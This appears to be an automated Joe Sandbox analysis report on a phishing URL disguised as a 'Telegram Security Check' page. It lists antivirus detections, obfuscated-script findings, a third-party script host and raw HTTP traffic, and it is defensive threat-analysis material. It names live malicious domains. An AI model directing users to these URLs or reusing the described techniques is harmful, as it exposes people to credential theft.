Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://wkybcnfuqpgjx.ltd/

Overview

General Information

Sample URL:https://wkybcnfuqpgjx.ltd/
Analysis ID:1589319
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML page contains hidden javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 5008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5532 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 3524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://wkybcnfuqpgjx.ltd/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://wkybcnfuqpgjx.ltd/Avira URL Cloud: detection malicious, Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ec.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fe.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f0.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f3.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1e8.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ff.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ea.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1ed.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/main.d54bfa037348b154a941.jsAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fb.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/5284.41380bbee618193f889a.jsAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1e9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ec.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1f7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ed.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1fc.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ea.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1e9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1ec.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1ee.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fe.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ea.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ff.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f4.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/compatTest.jsAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/favicon.icoAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/rlottie-wasm.f013598f1b2ba719f25e.jsAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ea.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f3.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/notification.mp3Avira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f3.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f6.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fe.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fc.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f0.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.324b1e6d0f5ae7c6ab42.woff2Avira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/7784.df07a876b22e3b2a83e9.jsAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/redirect.jsAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f6.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ff.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1e9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/chat-bg-pattern-light.ee148af944f6580293ae.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f8.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1e6.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1ed.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ef.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1ea.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f5.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ff.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f5.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fd.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1fc.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f3.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ff-1f1e6.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f0.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fa.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f1.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1fc.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1e8.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1e9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ea.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1eb.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1e6.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ee.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fa-1f1ec.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f3.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ed.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.465390c6e54c60f4a15f.woff2Avira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1fa.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ed.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1eb.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f2.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fc.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ff.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1e9.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f7.pngAvira URL Cloud: Label: phishing
Source: https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1e6.pngAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wkybcnfuqpgjx.ltd/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as a challenge platform, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://wkybcnfuqpgjx.ltd/... This script uses obfuscated code to modify the `navigator.userAgent` property, which could be used for malicious purposes such as fingerprinting or impersonation. While the intent is not entirely clear, the use of heavy obfuscation and modification of sensitive browser properties is concerning and warrants further investigation.
Source: https://wkybcnfuqpgjx.ltd/HTTP Parser: Base64 decoded: Telegram Security Check
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50826 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /main.949acaf34f3882f511ff.css HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /compatTest.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /main.d54bfa037348b154a941.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /compatTest.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script.js HTTP/1.1Host: hu.bafanglaicai.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_websync_?authed=0&version=10.9.21+A HTTP/1.1Host: t.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_websync_?authed=0&version=10.9.21+A HTTP/1.1Host: telegram.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.324b1e6d0f5ae7c6ab42.woff2 HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wkybcnfuqpgjx.ltdsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /KFOmCnqEu92Fr1Mu4mxKKTU1Kg.465390c6e54c60f4a15f.woff2 HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wkybcnfuqpgjx.ltdsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3559.80b270ba0e217557b392.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /notification.mp3 HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://wkybcnfuqpgjx.ltd/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /5193.75042954cc9da1f6d6ac.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat-bg-br.f34cc96fbfb048812820.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /main.d54bfa037348b154a941.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_websync_?authed=0&version=10.9.21+A HTTP/1.1Host: t.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_websync_?authed=0&version=10.9.21+A HTTP/1.1Host: telegram.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
